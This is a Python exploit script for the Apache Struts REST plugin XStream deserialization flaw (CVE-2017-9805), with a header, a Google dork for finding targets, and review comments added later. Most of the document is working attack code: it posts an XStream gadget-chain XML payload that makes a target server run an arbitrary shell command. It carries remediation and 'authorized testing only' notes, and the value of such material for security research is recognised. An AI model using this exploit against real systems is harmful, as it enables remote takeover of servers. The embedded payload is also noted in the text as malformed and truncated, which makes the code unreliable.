Apache Struts 2.5 - 2.5.12 - REST Plugin XStream Deserialization RCE (CVE-2017-9805)

# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
# Google Dork: filetype:action
# Date: 06/09/2017
# Exploit Author: Warflop
# Vendor Homepage: https://struts.apache.org/
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
# Version: Struts 2.5 - Struts 2.5.12 (inclusive; the REST plugin's XStream
#          handler deserializes an application/xml body without type restrictions)
# Tested on: Struts 2.5.10
# CVE : CVE-2017-9805
# Fixed in: Struts 2.5.13 (2.3.34 on the 2.3 branch). Remediation is to upgrade,
#           or to remove the XStream handler from the REST plugin. Use only against
#           systems you are authorized to test.

#!/usr/bin/env python3
# NOTE: a shebang is only honoured on the very first line of a file; as placed
#       here (below the header comments) it has no effect.
# coding=utf-8
# *****************************************************
# Struts CVE-2017-9805 Exploit
# Warflop (http://securityattack.com.br/)
# Greetz: Pimps & G4mbl3r
# *****************************************************
import sys
from xml.sax.saxutils import escape

import requests
  20.  
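def exploration(command, url=None, *, timeout=10.0):
    """POST the CVE-2017-9805 XStream payload to a Struts REST action and print the reply.

    Args:
        command: shell command the target executes as ``/bin/sh -c <command>``.
            It is XML-escaped before being embedded, so ``<``, ``>`` and ``&``
            in the command no longer break the document (the XML parser decodes
            the entities again before the string reaches ProcessBuilder).
        url: the REST action to POST to. Defaults to ``sys.argv[1]`` so existing
            callers that only pass ``command`` keep working as before.
        timeout: seconds to wait for connect/response; the original request had
            no timeout and would hang indefinitely on an unresponsive host.

    Returns:
        The HTTP response body as text (it is also printed, as before).

    Raises:
        requests.RequestException: on connection failure or timeout.

    For authorized testing only. Affected versions are fixed in Struts 2.5.13
    (2.3.34 on the 2.3 branch); removing the REST plugin's XStream handler
    also closes the code path.
    """
    if url is None:
        url = sys.argv[1]

    # Escape once, here, so the payload below stays a literal template.
    cmd = escape(command)

    # NOTE(review): as pasted, this document is not well-formed XML: <parameter>,
    # <lock>, <ibuffer>, <transferFlavors> and the <jdk reference=...> elements are
    # never closed, and the bare <jdk> element names look truncated by the paste
    # site. Only the HTML-entity damage on the <input .../> line (it was rendered
    # as &lt;input .../&gt;) is repaired here; compare the rest against the original
    # publication before relying on it.
    exploit = '''
    <map>
    <entry>
    <jdk>
    <flags>0</flags>
    <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
    <dataHandler>
    <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
    <is class="javax.crypto.CipherInputStream">
    <cipher class="javax.crypto.NullCipher">
    <initialized>false</initialized>
    <opmode>0</opmode>
    <serviceIterator class="javax.imageio.spi.FilterIterator">
    <iter class="javax.imageio.spi.FilterIterator">
    <iter class="java.util.Collections$EmptyIterator">
    <next class="java.lang.ProcessBuilder">
    <command>
    <string>/bin/sh</string><string>-c</string><string>''' + cmd + '''</string>
    </command>
    <redirectErrorStream>false</redirectErrorStream>
    </next>
    </iter>
    <filter class="javax.imageio.ImageIO$ContainsFilter">
    <method>
    <class>java.lang.ProcessBuilder</class>
    <name>start</name>
    <parameter>
    </method>
    <name>foo</name>
    </filter>
    <next class="string">foo</next>
    </serviceIterator>
    <lock>
    </cipher>
    <input class="java.lang.ProcessBuilder$NullInputStream"/>
    <ibuffer>
    <done>false</done>
    <ostart>0</ostart>
    <ofinish>0</ofinish>
    <closed>false</closed>
    </is>
    <consumed>false</consumed>
    </dataSource>
    <transferFlavors>
    </dataHandler>
    <dataLen>0</dataLen>
    </value>
    </jdk>
    <jdk reference="../jdk.nashorn.internal.objects.NativeString">
    </entry>
    <entry>
    <jdk reference="../../entry/jdk.nashorn.internal.objects.NativeString">
    <jdk reference="../../entry/jdk.nashorn.internal.objects.NativeString">
    </entry>
    </map>
    '''

    # Content-Type must be application/xml: that is what routes the body to the
    # REST plugin's XStream content handler.
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
        'Content-Type': 'application/xml',
    }

    response = requests.post(url, data=exploit, headers=headers, timeout=timeout)
    # Python 3 syntax: the original `print request.text` was a Py2 statement and
    # is a SyntaxError under the python3 interpreter named in the shebang.
    print(response.text)
    return response.text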
  88.  
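# Command-line entry point: ``python struts2.py URL COMMAND``.
# Guarded so importing the module (e.g. to reuse exploration()) does not
# fire a request or exit the interpreter.
if __name__ == "__main__":
    # The pasted source had this comparison HTML-escaped (`&lt; 3`), which is a
    # SyntaxError; restore the real operator.
    if len(sys.argv) < 3:
        print('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
        print('[*] Warflop - http://securityattack.com.br')
        print('[*] Greatz: Pimps & G4mbl3r')
        print('[*] Use: python struts2.py URL COMMAND')
        print('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
        # sys.exit rather than the site-provided `exit` builtin, which is not
        # guaranteed to exist when run with -S or in embedded interpreters.
        sys.exit(0)
    # exploration() reads the target URL from sys.argv[1] itself.
    exploration(sys.argv[2])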
